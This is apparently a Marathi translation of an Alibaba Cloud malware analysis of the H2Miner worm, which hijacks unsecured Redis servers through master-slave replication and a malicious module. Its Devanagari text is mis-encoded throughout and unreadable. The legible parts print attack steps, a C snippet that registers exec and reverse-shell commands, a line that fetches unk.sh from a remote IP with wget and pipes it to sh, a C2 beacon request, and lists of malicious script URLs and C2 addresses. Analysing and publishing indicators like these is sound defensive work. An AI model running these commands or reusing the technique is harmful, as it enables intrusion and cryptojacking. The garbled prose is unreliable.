H2Miner рд╡рд░реНрдореНрд╕рдЪрд╛ рдПрдХ рдирд╡реАрди рдЙрджреНрд░реЗрдХ рд╢реЛрдзрд▓рд╛ рдЧреЗрд▓рд╛ рдЖрд╣реЗ рдЬреЛ Redis RCE рдЪреЗ рд╢реЛрд╖рдг рдХрд░рддреЛ

рдПрдХрд╛ рджрд┐рд╡рд╕рд╛рдкреВрд░реНрд╡реА, рдорд╛рдЭреНрдпрд╛ рдкреНрд░реЛрдЬреЗрдХреНрдЯрдЪреНрдпрд╛ рд╕рд░реНрд╡реНрд╣рд░рд╡рд░ рдЕрд╢рд╛рдЪ рдХрд┐рдбреНрдпрд╛рдиреЗ рд╣рд▓реНрд▓рд╛ рдХреЗрд▓рд╛ рд╣реЛрддрд╛. "рддреЗ рдХрд╛рдп рд╣реЛрддреЗ?" рдпрд╛ рдкреНрд░рд╢реНрдирд╛рдЪреНрдпрд╛ рдЙрддреНрддрд░рд╛рдЪреНрдпрд╛ рд╢реЛрдзрд╛рдд рдорд▓рд╛ рдЕрд▓рд┐рдмрд╛рдмрд╛ рдХреНрд▓рд╛рдЙрдб рд╕рд┐рдХреНрдпреБрд░рд┐рдЯреА рдЯреАрдордЪрд╛ рдПрдХ рдЙрддреНрддрдо рд▓реЗрдЦ рд╕рд╛рдкрдбрд▓рд╛. рдорд▓рд╛ рд╣рд╛рдмреНрд░реЗрд╡рд░ рд╣рд╛ рд▓реЗрдЦ рд╕рд╛рдкрдбрд▓рд╛ рдирд╛рд╣реА рдореНрд╣рдгреВрди, рдореА рд╡рд┐рд╢реЗрд╖рддрдГ рддреБрдордЪреНрдпрд╛рд╕рд╛рдареА рдЕрдиреБрд╡рд╛рджрд┐рдд рдХрд░рдгреНрдпрд╛рдЪреЗ рдард░рд╡рд▓реЗ <3

рдиреЛрдВрдж

рдЕрд▓реАрдХрдбреЗрдЪ, рдЕрд▓реАрдмрд╛рдмрд╛ рдХреНрд▓рд╛рдЙрдбрдЪреНрдпрд╛ рд╕реБрд░рдХреНрд╖рд╛ рдкрдердХрд╛рдиреЗ H2Miner рдЪрд╛ рдЕрдЪрд╛рдирдХ рдЙрджреНрд░реЗрдХ рд╢реЛрдзрд▓рд╛. рдпрд╛ рдкреНрд░рдХрд╛рд░рдЪрд╛ рджреБрд░реНрднрд╛рд╡рдирд╛рдпреБрдХреНрдд рд╡рд░реНрдо рдЖрдкрд▓реНрдпрд╛ рд╕рд┐рд╕реНрдЯрдордЪреЗ рдкреНрд░рд╡реЗрд╢рджреНрд╡рд╛рд░ рдореНрд╣рдгреВрди Redis рд╕рд╛рдареА рдЕрдзрд┐рдХреГрддрддреЗрдЪрд╛ рдЕрднрд╛рд╡ рдХрд┐рдВрд╡рд╛ рдХрдордХреБрд╡рдд рд╕рдВрдХреЗрддрд╢рдмреНрдж рд╡рд╛рдкрд░рддреЛ, рддреНрдпрд╛рдирдВрддрд░ рддреЛ рдорд╛рд╕реНрдЯрд░-рд╕реНрд▓реЗрд╡реНрд╣ рд╕рд┐рдВрдХреНрд░реЛрдирд╛рдЗрдЭреЗрд╢рдирджреНрд╡рд╛рд░реЗ рд╕реНрд▓реЗрд╡реНрд╣рд╕рд╣ рд╕реНрд╡рддрдГрдЪреЗ рджреБрд░реНрднрд╛рд╡рдирд╛рдкреВрд░реНрдг рдореЙрдбреНрдпреВрд▓ рд╕рд┐рдВрдХреНрд░реЛрдирд╛рдЗрдЭ рдХрд░рддреЛ рдЖрдгрд┐ рд╢реЗрд╡рдЯреА рд╣реЗ рджреБрд░реНрднрд╛рд╡рдирд╛рдкреВрд░реНрдг рдореЙрдбреНрдпреВрд▓ рдЖрдХреНрд░рдордг рдХреЗрд▓реЗрд▓реНрдпрд╛ рдорд╢реАрдирд╡рд░ рдбрд╛рдЙрдирд▓реЛрдб рдХрд░рддреЛ рдЖрдгрд┐ рджреБрд░реНрднрд╛рд╡рдирд╛рдкреВрд░реНрдг рдХрд╛рд░реНрдпрд╛рдиреНрд╡рд┐рдд рдХрд░рддреЛ. рд╕реВрдЪрдирд╛.

рднреВрддрдХрд╛рд│рд╛рдд, рдЖрдХреНрд░рдордгрдХрд░реНрддреНрдпрд╛рдиреЗ Redis рдордзреНрдпреЗ рд▓реЙрдЧ рдЗрди рдХреЗрд▓реНрдпрд╛рдирдВрддрд░ рддреБрдордЪреНрдпрд╛ рдорд╢реАрдирд╡рд░ рд▓рд┐рд╣рд┐рд▓реНрдпрд╛ рдЧреЗрд▓реЗрд▓реНрдпрд╛ рд╢реЗрдбреНрдпреВрд▓ рдХреЗрд▓реЗрд▓реНрдпрд╛ рдЯрд╛рд╕реНрдХ рдХрд┐рдВрд╡рд╛ SSH рдХреАрдЪрд╛ рд╕рдорд╛рд╡реЗрд╢ рдЕрд╕рд▓реЗрд▓реНрдпрд╛ рдкрджреНрдзрддреАрдЪрд╛ рд╡рд╛рдкрд░ рдХрд░реВрди рддреБрдордЪреНрдпрд╛ рд╕рд┐рд╕реНрдЯрдорд╡рд░реАрд▓ рд╣рд▓реНрд▓реЗ рдкреНрд░рд╛рдореБрдЦреНрдпрд╛рдиреЗ рдХреЗрд▓реЗ рдЬрд╛рдд рд╣реЛрддреЗ. рд╕реБрджреИрд╡рд╛рдиреЗ, рд╣реА рдкрджреНрдзрдд рдкрд░рд╡рд╛рдирдЧреА рдирд┐рдпрдВрддреНрд░рдгрд╛рддреАрд▓ рд╕рдорд╕реНрдпрд╛рдВрдореБрд│реЗ рдХрд┐рдВрд╡рд╛ рднрд┐рдиреНрди рд╕рд┐рд╕реНрдЯрдо рдЖрд╡реГрддреНрддреНрдпрд╛рдВрдореБрд│реЗ рд╡рд╛рдкрд░рд▓реА рдЬрд╛рдК рд╢рдХрдд рдирд╛рд╣реА. рддрдерд╛рдкрд┐, рджреБрд░реНрднрд╛рд╡рдирд╛рдпреБрдХреНрдд рдореЙрдбреНрдпреВрд▓ рд▓реЛрдб рдХрд░рдгреНрдпрд╛рдЪреА рд╣реА рдкрджреНрдзрдд рдереЗрдЯ рдЖрдХреНрд░рдордгрдХрд░реНрддреНрдпрд╛рдЪреНрдпрд╛ рдЖрджреЗрд╢рд╛рдВрдЪреА рдЕрдВрдорд▓рдмрдЬрд╛рд╡рдгреА рдХрд░реВ рд╢рдХрддреЗ рдХрд┐рдВрд╡рд╛ рд╢реЗрд▓рдордзреНрдпреЗ рдкреНрд░рд╡реЗрд╢ рдорд┐рд│рд╡реВ рд╢рдХрддреЗ, рдЬреЗ рддреБрдордЪреНрдпрд╛ рд╕рд┐рд╕реНрдЯрдорд╕рд╛рдареА рдзреЛрдХрд╛рджрд╛рдпрдХ рдЖрд╣реЗ.

рдЗрдВрдЯрд░рдиреЗрдЯрд╡рд░ рд╣реЛрд╕реНрдЯ рдХреЗрд▓реЗрд▓реНрдпрд╛ рд░реЗрдбрд┐рд╕ рд╕рд░реНрд╡реНрд╣рд░рдЪреНрдпрд╛ рдореЛрдареНрдпрд╛ рд╕рдВрдЦреНрдпреЗрдореБрд│реЗ (рдЬрд╡рд│рдкрд╛рд╕ 1 рджрд╢рд▓рдХреНрд╖), Alibaba рдХреНрд▓рд╛рдЙрдбрдЪреА рд╕реБрд░рдХреНрд╖рд╛ рдЯреАрдо, рдПрдХ рдореИрддреНрд░реАрдкреВрд░реНрдг рд╕реНрдорд░рдгрдкрддреНрд░ рдореНрд╣рдгреВрди, рд╡рд╛рдкрд░рдХрд░реНрддреНрдпрд╛рдВрдиреА Redis рдСрдирд▓рд╛рдЗрди рд╢реЗрдЕрд░ рдХрд░реВ рдирдпреЗ рдЖрдгрд┐ рддреНрдпрд╛рдВрдЪреНрдпрд╛ рдкрд╛рд╕рд╡рд░реНрдбрдЪреА рддрд╛рдХрдж рдЖрдгрд┐ рддреНрдпрд╛рдВрдЪреНрдпрд╛рд╢реА рддрдбрдЬреЛрдб рдХреЗрд▓реА рдЖрд╣реЗ рдХреА рдирд╛рд╣реА рд╣реЗ рдирд┐рдпрдорд┐рддрдкрдгреЗ рддрдкрд╛рд╕рдгреНрдпрд╛рдЪреА рд╢рд┐рдлрд╛рд░рд╕ рдХреЗрд▓реА рдЖрд╣реЗ. рджреНрд░реБрдд рдирд┐рд╡рдб.

H2 Miner

H2Miner рд╣реЗ рд▓рд┐рдирдХреНрд╕-рдЖрдзрд╛рд░рд┐рдд рд╕рд┐рд╕реНрдЯреАрдорд╕рд╛рдареА рдПрдХ рдорд╛рдпрдирд┐рдВрдЧ рдмреЙрдЯрдиреЗрдЯ рдЖрд╣реЗ рдЬреЗ рдЖрдкрд▓реНрдпрд╛ рд╕рд┐рд╕реНрдЯрдорд╡рд░ рд╣рдбреВрдк рдпрд╛рд░реНрди, рдбреЙрдХрд░ рдЖрдгрд┐ рд░реЗрдбрд┐рд╕ рд░рд┐рдореЛрдЯ рдХрдорд╛рдВрдб рдПрдХреНрдЭрд┐рдХреНрдпреБрд╢рди (RCE) рднреЗрджреНрдпрддреЗрдЪреНрдпрд╛ рдЕрднрд╛рд╡рд╛рд╕рд╣ рд╡рд┐рд╡рд┐рдз рдорд╛рд░реНрдЧрд╛рдВрдиреА рдЖрдХреНрд░рдордг рдХрд░реВ рд╢рдХрддреЗ. рдмреЙрдЯрдиреЗрдЯ рджреБрд░реНрднрд╛рд╡рдирд╛рдкреВрд░реНрдг рд╕реНрдХреНрд░рд┐рдкреНрдЯреНрд╕ рдЖрдгрд┐ рдорд╛рд▓рд╡реЗрдЕрд░ рдбрд╛рдЙрдирд▓реЛрдб рдХрд░реВрди рддреБрдордЪрд╛ рдбреЗрдЯрд╛ рдЦрдгреВрди рдХрд╛рд░реНрдп рдХрд░рддреЗ, рд╣рд▓реНрд▓рд╛ рдЖрдбрд╡рд╛ рд╡рд╛рдврд╡рддреЗ рдЖрдгрд┐ рдХрдорд╛рдВрдб рдЖрдгрд┐ рдХрдВрдЯреНрд░реЛрд▓ (C&C) рд╕рдВрдкреНрд░реЗрд╖рдгреЗ рд░рд╛рдЦрддреЗ.

Redis RCE

рдпрд╛ рд╡рд┐рд╖рдпрд╛рд╡рд░реАрд▓ рдЬреНрдЮрд╛рди рдкрд╛рд╡реЗрд▓ рдЯреЛрдкреЛрд░рдХреЛрд╡реНрд╣ рдпрд╛рдВрдиреА ZeroNights 2018 рдордзреНрдпреЗ рд╕рд╛рдорд╛рдпрд┐рдХ рдХреЗрд▓реЗ рд╣реЛрддреЗ. рдЖрд╡реГрддреНрддреА 4.0 рдирдВрддрд░, Redis рдкреНрд▓рдЧ-рдЗрди рд▓реЛрдбрд┐рдВрдЧ рд╡реИрд╢рд┐рд╖реНрдЯреНрдпрд╛рд╕ рд╕рдорд░реНрдерди рджреЗрддреЗ рдЬреЗ рд╡рд╛рдкрд░рдХрд░реНрддреНрдпрд╛рдВрдирд╛ рд▓реЛрдб рдХрд░рдгреНрдпрд╛рдЪреА рдХреНрд╖рдорддрд╛ рджреЗрддреЗ рдЬреЗрдгреЗрдХрд░реВрди Redis рдордзреНрдпреЗ C рд╕рд╣ рд╕рдВрдХрд▓рд┐рдд рдХреЗрд▓реЗрд▓реНрдпрд╛ рдлрд╛рдЗрд▓реНрд╕ рд╡рд┐рд╢рд┐рд╖реНрдЯ Redis рдХрдорд╛рдВрдб рдХрд╛рд░реНрдпрд╛рдиреНрд╡рд┐рдд рдХрд░рдгреНрдпрд╛рд╕рд╛рдареА. рд╣реЗ рдХрд╛рд░реНрдп, рдЬрд░реА рдЙрдкрдпреБрдХреНрдд рдЕрд╕рд▓реЗ рддрд░реА, рддреНрдпрд╛рдд рдПрдХ рдЕрд╕реБрд░рдХреНрд╖рд╛ рдЖрд╣реЗ рдЬреНрдпрд╛рдордзреНрдпреЗ, рдорд╛рд╕реНрдЯрд░-рд╕реНрд▓реЗрд╡реНрд╣ рдореЛрдбрдордзреНрдпреЗ, рдлрд╛рдИрд▓реНрд╕ рдлреБрд▓рд░реЗрд╕рд┐рдВрдХ рдореЛрдбрджреНрд╡рд╛рд░реЗ рд╕реНрд▓реЗрд╡реНрд╣рд╕рд╣ рд╕рдордХреНрд░рдорд┐рдд рдХреЗрд▓реНрдпрд╛ рдЬрд╛рдК рд╢рдХрддрд╛рдд. рд╣реЗ рджреБрд░реНрднрд╛рд╡рдирд╛рдкреВрд░реНрдг рдлрд╛рдпрд▓реА рд╣рд╕реНрддрд╛рдВрддрд░рд┐рдд рдХрд░рдгреНрдпрд╛рд╕рд╛рдареА рдЖрдХреНрд░рдордгрдХрд░реНрддреНрдпрд╛рджреНрд╡рд╛рд░реЗ рд╡рд╛рдкрд░рд▓реЗ рдЬрд╛рдК рд╢рдХрддреЗ. рд╣рд╕реНрддрд╛рдВрддрд░рдг рдкреВрд░реНрдг рдЭрд╛рд▓реНрдпрд╛рдирдВрддрд░, рдЖрдХреНрд░рдордгрдХрд░реНрддреЗ рдЖрдХреНрд░рдордг рдХреЗрд▓реЗрд▓реНрдпрд╛ рд░реЗрдбрд┐рд╕ рдЙрджрд╛рд╣рд░рдгрд╛рд╡рд░ рдореЙрдбреНрдпреВрд▓ рд▓реЛрдб рдХрд░рддрд╛рдд рдЖрдгрд┐ рдХреЛрдгрддреАрд╣реА рдХрдорд╛рдВрдб рдХрд╛рд░реНрдпрд╛рдиреНрд╡рд┐рдд рдХрд░рддрд╛рдд.

рдорд╛рд▓рд╡реЗрдЕрд░ рд╡рд░реНрдо рд╡рд┐рд╢реНрд▓реЗрд╖рдг

рдЕрд▓реАрдХрдбреЗ, рдЕрд▓реАрдмрд╛рдмрд╛ рдХреНрд▓рд╛рдЙрдб рд╕реБрд░рдХреНрд╖рд╛ рд╕рдВрдШрд╛рдиреЗ рд╢реЛрдзреВрди рдХрд╛рдврд▓реЗ рдХреА H2Miner рджреБрд░реНрднрд╛рд╡рдирд╛рдкреВрд░реНрдг рдЦрд╛рдг рдХрд╛рдордЧрд╛рд░ рдЧрдЯрд╛рдЪрд╛ рдЖрдХрд╛рд░ рдЕрдЪрд╛рдирдХ рдирд╛рдЯрдХреАрдпрд░рд┐рддреНрдпрд╛ рд╡рд╛рдврд▓рд╛ рдЖрд╣реЗ. рд╡рд┐рд╢реНрд▓реЗрд╖рдгрд╛рдиреБрд╕рд╛рд░, рд╣рд▓реНрд▓реНрдпрд╛рдЪреНрдпрд╛ рдШрдЯрдиреЗрдЪреА рд╕рд╛рдорд╛рдиреНрдп рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдЦрд╛рд▓реАрд▓рдкреНрд░рдорд╛рдгреЗ рдЖрд╣реЗ:

H2Miner рд╡рд░реНрдореНрд╕рдЪрд╛ рдПрдХ рдирд╡реАрди рдЙрджреНрд░реЗрдХ рд╢реЛрдзрд▓рд╛ рдЧреЗрд▓рд╛ рдЖрд╣реЗ рдЬреЛ Redis RCE рдЪреЗ рд╢реЛрд╖рдг рдХрд░рддреЛ

H2Miner рдкреВрд░реНрдг рд╣рд▓реНрд▓реНрдпрд╛рд╕рд╛рдареА RCE Redis рд╡рд╛рдкрд░рддреЗ. рд╣рд▓реНрд▓реЗрдЦреЛрд░ рдкреНрд░рдердо рдЕрд╕реБрд░рдХреНрд╖рд┐рдд рд░реЗрдбрд┐рд╕ рд╕рд░реНрд╡реНрд╣рд░ рдХрд┐рдВрд╡рд╛ рдХрдордХреБрд╡рдд рдкрд╛рд╕рд╡рд░реНрдб рдЕрд╕рд▓реЗрд▓реНрдпрд╛ рд╕рд░реНрд╡реНрд╣рд░рд╡рд░ рд╣рд▓реНрд▓рд╛ рдХрд░рддрд╛рдд.

рдордЧ рддреЗ рдХрдорд╛рдВрдб рд╡рд╛рдкрд░рддрд╛рдд config set dbfilename red2.so рдлрд╛рдЗрд▓рдЪреЗ рдирд╛рд╡ рдмрджрд▓рдгреНрдпрд╛рд╕рд╛рдареА. рдпрд╛рдирдВрддрд░, рд╣рд▓реНрд▓реЗрдЦреЛрд░ рдЖрджреЗрд╢рд╛рдЪреА рдЕрдВрдорд▓рдмрдЬрд╛рд╡рдгреА рдХрд░рддрд╛рдд slaveof рдорд╛рд╕реНрдЯрд░-рд╕реНрд▓реЗрд╡реНрд╣ рдкреНрд░рддрд┐рдХреГрддреА рд╣реЛрд╕реНрдЯ рдкрддреНрддрд╛ рд╕реЗрдЯ рдХрд░рдгреНрдпрд╛рд╕рд╛рдареА.

рдЖрдХреНрд░рдордг рдХреЗрд▓реЗрд▓реНрдпрд╛ рд░реЗрдбрд┐рд╕ рдЙрджрд╛рд╣рд░рдгрд╛рдиреЗ рдЖрдХреНрд░рдордгрдХрд░реНрддреНрдпрд╛рдЪреНрдпрд╛ рдорд╛рд▓рдХреАрдЪреНрдпрд╛ рджреБрд░реНрднрд╛рд╡рдирд╛рдкреВрд░реНрдг рд░реЗрдбрд┐рд╕рд╕рд╣ рдорд╛рд╕реНрдЯрд░-рд╕реНрд▓реЗрд╡реНрд╣ рдХрдиреЗрдХреНрд╢рди рд╕реНрдерд╛рдкрд┐рдд рдХреЗрд▓реЗ, рддреЗрд╡реНрд╣рд╛ рдЖрдХреНрд░рдордгрдХрд░реНрддрд╛ рдлрд╛рдЗрд▓реНрд╕ рд╕рд┐рдВрдХреНрд░реЛрдирд╛рдЗрдЭ рдХрд░рдгреНрдпрд╛рд╕рд╛рдареА рдлреБрд▓рд░реЗрд╕рд┐рдВрдХ рдХрдорд╛рдВрдб рд╡рд╛рдкрд░реВрди рд╕рдВрдХреНрд░рдорд┐рдд рдореЙрдбреНрдпреВрд▓ рдкрд╛рдард╡рддреЛ. red2.so рдлрд╛рдИрд▓ рдирдВрддрд░ рдЖрдХреНрд░рдордг рдХреЗрд▓реЗрд▓реНрдпрд╛ рдорд╢реАрдирд╡рд░ рдбрд╛рдЙрдирд▓реЛрдб рдХреЗрд▓реА рдЬрд╛рдИрд▓. рд╣рд▓реНрд▓реЗрдЦреЛрд░ рдирдВрддрд░ рд╣реА рдлрд╛рдЗрд▓ рд▓реЛрдб рдХрд░рдгреНрдпрд╛рд╕рд╛рдареА ./red2.so рд▓реЛрдбрд┐рдВрдЧ рдореЙрдбреНрдпреВрд▓ рд╡рд╛рдкрд░рддрд╛рдд. рдореЙрдбреНрдпреВрд▓ рдЖрдХреНрд░рдордгрдХрд░реНрддреНрдпрд╛рдХрдбреВрди рдЖрджреЗрд╢ рдХрд╛рд░реНрдпрд╛рдиреНрд╡рд┐рдд рдХрд░реВ рд╢рдХрддреЗ рдХрд┐рдВрд╡рд╛ рдЖрдХреНрд░рдордг рдХреЗрд▓реЗрд▓реНрдпрд╛ рдорд╢реАрдирдордзреНрдпреЗ рдкреНрд░рд╡реЗрд╢ рдорд┐рд│рд╡рд┐рдгреНрдпрд╛рд╕рд╛рдареА рд░рд┐рд╡реНрд╣рд░реНрд╕ рдХрдиреЗрдХреНрд╢рди (рдмреЕрдХрдбреЛрдЕрд░) рд╕реБрд░реВ рдХрд░реВ рд╢рдХрддреЗ.

if (RedisModule_CreateCommand(ctx, "system.exec",
        DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;
      if (RedisModule_CreateCommand(ctx, "system.rev",
        RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;

рджреБрд░реНрднрд╛рд╡рдирд╛рдпреБрдХреНрдд рдХрдорд╛рдВрдб рдХрд╛рд░реНрдпрд╛рдиреНрд╡рд┐рдд рдХреЗрд▓реНрдпрд╛рдирдВрддрд░ рдЬрд╕реЗ рдХреА / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, рдЖрдХреНрд░рдордгрдХрд░реНрддрд╛ рдмреЕрдХрдЕрдк рдлрд╛рдЗрд▓ рдирд╛рд╡ рд░реАрд╕реЗрдЯ рдХрд░реЗрд▓ рдЖрдгрд┐ рдЯреНрд░реЗрд╕ рд╕рд╛рдл рдХрд░рдгреНрдпрд╛рд╕рд╛рдареА рд╕рд┐рд╕реНрдЯрдо рдореЙрдбреНрдпреВрд▓ рдЕрдирд▓реЛрдб рдХрд░реЗрд▓. рддрдерд╛рдкрд┐, red2.so рдлрд╛рдИрд▓ рдЕрджреНрдпрд╛рдк рдЖрдХреНрд░рдордг рдХреЗрд▓реЗрд▓реНрдпрд╛ рдорд╢реАрдирд╡рд░ рд░рд╛рд╣реАрд▓. рд╡рд╛рдкрд░рдХрд░реНрддреНрдпрд╛рдВрдирд╛ рддреНрдпрд╛рдВрдЪреНрдпрд╛ рд░реЗрдбрд┐рд╕ рдЙрджрд╛рд╣рд░рдгрд╛рдЪреНрдпрд╛ рдлреЛрд▓реНрдбрд░рдордзреНрдпреЗ рдЕрд╢рд╛ рд╕рдВрд╢рдпрд╛рд╕реНрдкрдж рдлрд╛рдЗрд▓рдЪреНрдпрд╛ рдЙрдкрд╕реНрдерд┐рддреАрдХрдбреЗ рд▓рдХреНрд╖ рджреЗрдгреНрдпрд╛рдЪреА рд╕рд▓реНрд▓рд╛ рджреЗрдгреНрдпрд╛рдд рдЖрд▓реА рдЖрд╣реЗ.

рд╕рдВрд╕рд╛рдзрдиреЗ рдЪреЛрд░рдгреНрдпрд╛рд╕рд╛рдареА рдХрд╛рд╣реА рджреБрд░реНрднрд╛рд╡рдирд╛рдкреВрд░реНрдг рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдорд╛рд░рдгреНрдпрд╛рд╡реНрдпрддрд┐рд░рд┐рдХреНрдд, рдЖрдХреНрд░рдордгрдХрд░реНрддреНрдпрд╛рдиреЗ рджреБрд░реНрднрд╛рд╡рдирд╛рдкреВрд░реНрдг рдмрд╛рдпрдирд░реА рдлрд╛рдЗрд▓ рдбрд╛рдЙрдирд▓реЛрдб рдХрд░реВрди рдЖрдгрд┐ рдХрд╛рд░реНрдпрд╛рдиреНрд╡рд┐рдд рдХрд░реВрди рджреБрд░реНрднрд╛рд╡рдирд╛рдкреВрд░реНрдг рд╕реНрдХреНрд░рд┐рдкреНрдЯрдЪреЗ рдЕрдиреБрд╕рд░рдг рдХреЗрд▓реЗ. 142.44.191.122/kinsing. рдпрд╛рдЪрд╛ рдЕрд░реНрде рдЕрд╕рд╛ рдХреА рд╣реЛрд╕реНрдЯрд╡рд░реАрд▓ kinsing рдЕрд╕рд▓реЗрд▓реЗ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдирд╛рд╡ рдХрд┐рдВрд╡рд╛ рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдирд╛рд╡ рд╣реЗ рд╕реВрдЪрд┐рдд рдХрд░реВ рд╢рдХрддреЗ рдХреА рдорд╢реАрдирд▓рд╛ рдпрд╛ рд╡рд┐рд╖рд╛рдгреВрдЪрд╛ рд╕рдВрд╕рд░реНрдЧ рдЭрд╛рд▓рд╛ рдЖрд╣реЗ.

рдЙрд▓рдЯ рдЕрднрд┐рдпрд╛рдВрддреНрд░рд┐рдХреА рдкрд░рд┐рдгрд╛рдорд╛рдВрдиреБрд╕рд╛рд░, рдорд╛рд▓рд╡реЗрдЕрд░ рдкреНрд░рд╛рдореБрдЦреНрдпрд╛рдиреЗ рдЦрд╛рд▓реАрд▓ рдХрд╛рд░реНрдпреЗ рдХрд░рддреЗ:

  • рдлрд╛рдпрд▓реА рдЕрдкрд▓реЛрдб рдХрд░рдгреЗ рдЖрдгрд┐ рддреЗ рдХрд╛рд░реНрдпрд╛рдиреНрд╡рд┐рдд рдХрд░рдгреЗ
  • рдЦрд╛рдгрдХрд╛рдо
  • C&C рд╕рдВрдкреНрд░реЗрд╖рдг рд░рд╛рдЦрдгреЗ рдЖрдгрд┐ рдЖрдХреНрд░рдордгрдХрд░реНрддреНрдпрд╛рдВрдЪреНрдпрд╛ рдЖрджреЗрд╢рд╛рдВрдЪреА рдЕрдВрдорд▓рдмрдЬрд╛рд╡рдгреА рдХрд░рдгреЗ

H2Miner рд╡рд░реНрдореНрд╕рдЪрд╛ рдПрдХ рдирд╡реАрди рдЙрджреНрд░реЗрдХ рд╢реЛрдзрд▓рд╛ рдЧреЗрд▓рд╛ рдЖрд╣реЗ рдЬреЛ Redis RCE рдЪреЗ рд╢реЛрд╖рдг рдХрд░рддреЛ

рддреБрдордЪрд╛ рдкреНрд░рднрд╛рд╡ рд╡рд╛рдврд╡рдгреНрдпрд╛рд╕рд╛рдареА рдмрд╛рд╣реНрдп рд╕реНрдХреЕрдирд┐рдВрдЧрд╕рд╛рдареА masscan рд╡рд╛рдкрд░рд╛. рдпрд╛рд╡реНрдпрддрд┐рд░рд┐рдХреНрдд, рдкреНрд░реЛрдЧреНрд░рд╛рдордордзреНрдпреЗ C&C рд╕рд░реНрд╡реНрд╣рд░рдЪрд╛ IP рдкрддреНрддрд╛ рд╣рд╛рд░реНрдб-рдХреЛрдб рдХреЗрд▓реЗрд▓рд╛ рдЖрд╣реЗ рдЖрдгрд┐ рд╣рд▓реНрд▓рд╛ рдХреЗрд▓реЗрд▓рд╛ рд╣реЛрд╕реНрдЯ HTTP рд╡рд┐рдирдВрддреНрдпрд╛ рд╡рд╛рдкрд░реВрди C&C рдХрдореНрдпреБрдирд┐рдХреЗрд╢рди рд╕рд░реНрд╡реНрд╣рд░рд╢реА рд╕рдВрдкреНрд░реЗрд╖рдг рдХрд░реЗрд▓, рдЬреЗрдереЗ рдЭреЛрдореНрдмреА (рддрдбрдЬреЛрдб рд╕рд░реНрд╡реНрд╣рд░) рдорд╛рд╣рд┐рддреА HTTP рд╢реАрд░реНрд╖рд▓реЗрдЦрд╛рдд рдУрд│рдЦрд▓реА рдЬрд╛рддреЗ.

H2Miner рд╡рд░реНрдореНрд╕рдЪрд╛ рдПрдХ рдирд╡реАрди рдЙрджреНрд░реЗрдХ рд╢реЛрдзрд▓рд╛ рдЧреЗрд▓рд╛ рдЖрд╣реЗ рдЬреЛ Redis RCE рдЪреЗ рд╢реЛрд╖рдг рдХрд░рддреЛ

GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip

рдЗрддрд░ рдЖрдХреНрд░рдордг рдкрджреНрдзрддреА

H2Miner рд╡рд░реНрдореНрд╕рдЪрд╛ рдПрдХ рдирд╡реАрди рдЙрджреНрд░реЗрдХ рд╢реЛрдзрд▓рд╛ рдЧреЗрд▓рд╛ рдЖрд╣реЗ рдЬреЛ Redis RCE рдЪреЗ рд╢реЛрд╖рдг рдХрд░рддреЛ

рдЕрд│реА рджреНрд╡рд╛рд░реЗ рд╡рд╛рдкрд░рд▓реЗрд▓реЗ рдкрддреНрддреЗ рдЖрдгрд┐ рджреБрд╡реЗ

/ рдирд╛рддреЗрд╕рдВрдмрдВрдз

тАв 142.44.191.122/t.sh
тАв 185.92.74.42/h.sh
тАв 142.44.191.122/spr.sh
тАв 142.44.191.122/spre.sh
тАв 195.3.146.118/unk.sh

s&c

тАв 45.10.88.102
тАв 91.215.169.111
тАв 139.99.50.255
тАв 46.243.253.167
тАв 195.123.220.193

рдЯреАрдк

рдкреНрд░рдердо, Redis рдЗрдВрдЯрд░рдиреЗрдЯрд╡рд░реВрди рдкреНрд░рд╡реЗрд╢ рдХрд░рдгреНрдпрд╛рдпреЛрдЧреНрдп рдирд╕рд╛рд╡реЗ рдЖрдгрд┐ рдордЬрдмреВрдд рдкрд╛рд╕рд╡рд░реНрдбрд╕рд╣ рд╕рдВрд░рдХреНрд╖рд┐рдд рдХреЗрд▓реЗ рдЬрд╛рд╡реЗ. рд░реЗрдбрд┐рд╕ рдирд┐рд░реНрджреЗрд╢рд┐рдХреЗрдд рдХреЛрдгрддреАрд╣реА red2.so рдлрд╛рдИрд▓ рдирд╛рд╣реА рдЖрдгрд┐ рд╣реЛрд╕реНрдЯрд╡рд░реАрд▓ рдлрд╛рдЗрд▓/рдкреНрд░рдХреНрд░рд┐рдпреЗрдЪреНрдпрд╛ рдирд╛рд╡рд╛рдордзреНрдпреЗ "рдХрд┐рдиреНрд╕рд┐рдВрдЧ" рдирд╛рд╣реА рд╣реЗ рдХреНрд▓рд╛рдпрдВрдЯрдиреЗ рддрдкрд╛рд╕рдгреЗ рджреЗрдЦреАрд▓ рдорд╣рддреНрддреНрд╡рд╛рдЪреЗ рдЖрд╣реЗ.

рд╕реНрддреНрд░реЛрдд: www.habr.com

рдПрдХ рдЯрд┐рдкреНрдкрдгреА рдЬреЛрдбрд╛